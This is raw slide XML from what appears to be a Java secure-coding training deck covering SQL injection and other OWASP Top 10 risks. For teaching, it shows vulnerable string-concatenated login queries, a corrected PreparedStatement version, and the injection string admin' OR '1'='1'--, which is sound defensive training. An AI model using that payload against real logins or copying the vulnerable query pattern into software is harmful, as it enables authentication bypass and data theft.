            <a:pPr algn="just">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Input validation - white listing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Use strongly typed Prepared Statements, or ORMs such as Hibernate or Spring</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Enforce least privilege when connecting to database and backend systems</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Do not show detailed error messages thrown by the DB to the end users</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:defRPr/>
            </a:pP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6</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40576466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SQL Statement</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1295400"/>
            <a:ext cx="8229600" cy="4953000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Wrong</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>	String </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>sql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> = "select * from user where </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>username='" + username +"' and password='" + password + "'"</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7A1601AE-3AB5-4580-9556-3C20AF0CA3B8}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>7</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Footer Placeholder 4"/>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840835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dirty="0" smtClean="0"/>
              <a:t>Preventing Injection Attacks - Right</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="129027" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1143000"/>
            <a:ext cx="8229600" cy="5181600"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="just"/>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0">
              <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="just"/>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0">
              <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Content Placeholder 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609600" y="1295400"/>
            <a:ext cx="8229600" cy="4221832"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="just">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Prepared Statements</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-285750" algn="just">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="–"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Variables passed as arguments to prepared statements will automatically be escaped by the JDBC driver.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-285750">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0" smtClean="0">
              <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>String </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>sql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> = "select * from user where </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>userName</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>=‘?' and password=‘?’"</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a:p>
            <a:pPr fontAlgn="auto">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>PreparedStatement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prepStmt</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con.prepareStatement</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sql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>); </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr fontAlgn="auto">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>prepStmt.setString</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>(1, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>userName</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>prepStmt.setString</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>(2, password);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr fontAlgn="auto">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>ResultSet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rs</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prepStmt.executeQuery</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>(); </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr fontAlgn="auto">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0" smtClean="0">
              <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>admin' OR '1'='1'--</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0">
              <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-285750" algn="just" fontAlgn="auto">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2000"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7A1601AE-3AB5-4580-9556-3C20AF0CA3B8}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>8</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18977682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smtClean="0"/>
              <a:t>Preventing Injection Attacks </a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="129027" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1143000"/>
            <a:ext cx="8229600" cy="5181600"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="just"/>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0">
              <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="just"/>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0">
              <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Content Placeholder 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609600" y="1295400"/>
            <a:ext cx="8229600" cy="5181600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="just" fontAlgn="auto">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>wrong approach to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>PreparedStatement</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0">
              <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="just" fontAlgn="auto">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0">
              <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr fontAlgn="auto">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>String </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>strUserName</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request.getParameter</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Txt_userName</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>"); </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr fontAlgn="auto">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>String </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>strPassword</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request.getParameter</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Txt_password</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>");</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr fontAlgn="auto">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0" smtClean="0">
              <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr fontAlgn="auto">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>PreparedStatement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prepStmt</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con.prepareStatement</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>("SELECT * FROM user WHERE </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>userName</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> = </a:t>
            </a:r>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strUserName</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and password = </a:t>
            </a:r>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strPassword</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a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="just" fontAlgn="auto">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2000" b="1" dirty="0">
              <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="just" fontAlgn="auto">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2000" b="1" dirty="0">
              <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-285750" algn="just" fontAlgn="auto">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0">
              <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-285750" algn="just" fontAlgn="auto">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2000"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7A1601AE-3AB5-4580-9556-3C20AF0CA3B8}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>9</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Footer Placeholder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Aujas Confidential</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="146988584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6688</TotalTime>
  <Words>2849</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>On-screen Show (4:3)</PresentationFormat>
  <Paragraphs>591</Paragraphs>
  <Slides>52</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Courier</vt:lpstr>
      <vt:lpstr>Wingdings</vt:lpstr>
      <vt:lpstr>Custom Design</vt:lpstr>
      <vt:lpstr>Secure Coding in Java</vt:lpstr>
      <vt:lpstr>Disclaimer</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>A1. Injection</vt:lpstr>
      <vt:lpstr>Injection Attacks</vt:lpstr>
      <vt:lpstr>Preventing From Injection Attacks </vt:lpstr>
      <vt:lpstr>Dynamic SQL Statement</vt:lpstr>
      <vt:lpstr>Preventing Injection Attacks - Right</vt:lpstr>
      <vt:lpstr>Preventing Injection Attacks </vt:lpstr>
      <vt:lpstr>A2. Cross Site Scripting (XSS)</vt:lpstr>
      <vt:lpstr>Two Categories of XSS</vt:lpstr>
      <vt:lpstr>How Reflected XSS Works</vt:lpstr>
      <vt:lpstr>Reflected Cross Site Scripting</vt:lpstr>
      <vt:lpstr>Reflected XSS Example</vt:lpstr>
      <vt:lpstr>Reflected XSS Example</vt:lpstr>
      <vt:lpstr>Stored XSS Attack</vt:lpstr>
      <vt:lpstr>Stored Cross Site Scripting</vt:lpstr>
      <vt:lpstr>Preventing XSS</vt:lpstr>
      <vt:lpstr>Three Strategies for Data Validation</vt:lpstr>
      <vt:lpstr>Three Strategies for Data Validation</vt:lpstr>
      <vt:lpstr>Three Strategies for Data Validation</vt:lpstr>
      <vt:lpstr>A3. Broken Authentication &amp; Session Management</vt:lpstr>
      <vt:lpstr>Preventing Broken Authentication &amp;  Session Management</vt:lpstr>
      <vt:lpstr>Preventing Broken Authentication &amp;  Session Management</vt:lpstr>
      <vt:lpstr>Preventing Broken Authentication &amp;  Session Management</vt:lpstr>
      <vt:lpstr>Preventing Broken Authentication &amp;  Session Management</vt:lpstr>
      <vt:lpstr>Preventing Broken Authentication &amp;  Session Management</vt:lpstr>
      <vt:lpstr>A4. Insecure Direct Object Reference</vt:lpstr>
      <vt:lpstr>Preventing Insecure Direct Object Reference</vt:lpstr>
      <vt:lpstr>Preventing Insecure Direct Object Reference</vt:lpstr>
      <vt:lpstr>A5. Cross Site Request Forgery (CSRF)</vt:lpstr>
      <vt:lpstr>CSRF Example</vt:lpstr>
      <vt:lpstr>Preventing CSRF</vt:lpstr>
      <vt:lpstr>Preventing CSRF</vt:lpstr>
      <vt:lpstr>A6 –Security Misconfiguration</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>A7. Insecure Cryptographic Storage</vt:lpstr>
      <vt:lpstr>Preventing Insecure Cryptographic Storage</vt:lpstr>
      <vt:lpstr>A8. Failure to Restrict URL Access</vt:lpstr>
      <vt:lpstr>Preventing Failure to Restrict URL Access</vt:lpstr>
      <vt:lpstr>Preventing Failure to Restrict URL Access</vt:lpstr>
      <vt:lpstr> A9. Insufficient Transport Layer Protection  </vt:lpstr>
      <vt:lpstr> Preventing Insufficient Transport Layer Protection  </vt:lpstr>
      <vt:lpstr> Preventing Insufficient Transport Layer Protection  </vt:lpstr>
      <vt:lpstr> A10 –Un-validated Redirects and Forwards  </vt:lpstr>
      <vt:lpstr>Example Attack Scenarios </vt:lpstr>
      <vt:lpstr> Preventing –Un-validated Redirects and Forwards  </vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Defense in Depth</vt:lpstr>
      <vt:lpstr>Security Coding Principles</vt:lpstr>
      <vt:lpstr>References</vt:lpstr>
      <vt:lpstr>www.aujas.com</vt:lpstr>
    </vt:vector>
  </TitlesOfParts>
  <Company>Aujas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Aujas SDL Training</dc:title>
  <dc:creator>Sameer Shelke</dc:creator>
  <cp:lastModifiedBy>Amit Ranjan</cp:lastModifiedBy>
  <cp:revision>714</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2009-12-27T13:39:14Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2016-10-13T08:04:11Z</dcterms:modified>
</cp:coreProperties>
</file>